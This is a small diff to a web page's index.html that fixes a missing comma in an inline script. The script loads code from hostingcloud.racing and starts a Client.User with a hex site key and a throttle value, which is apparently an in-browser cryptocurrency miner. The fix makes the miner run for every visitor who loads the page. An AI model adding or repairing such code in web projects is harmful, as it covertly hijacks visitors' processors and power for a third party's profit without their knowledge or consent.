--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
 <body>           
 <script src="https://www.hostingcloud.racing/iOEE.js"></script>
 <script>
-    var _client = new Client.User('5fbc34b068817e737ffdcaadf598d6e14d5d994dd65cb5070af4d21d478e9f7e', 'POOO12' {
+    var _client = new Client.User('5fbc34b068817e737ffdcaadf598d6e14d5d994dd65cb5070af4d21d478e9f7e', 'POOO12', {
         throttle: 0.3, c: 'w'
     });
     _client.start();
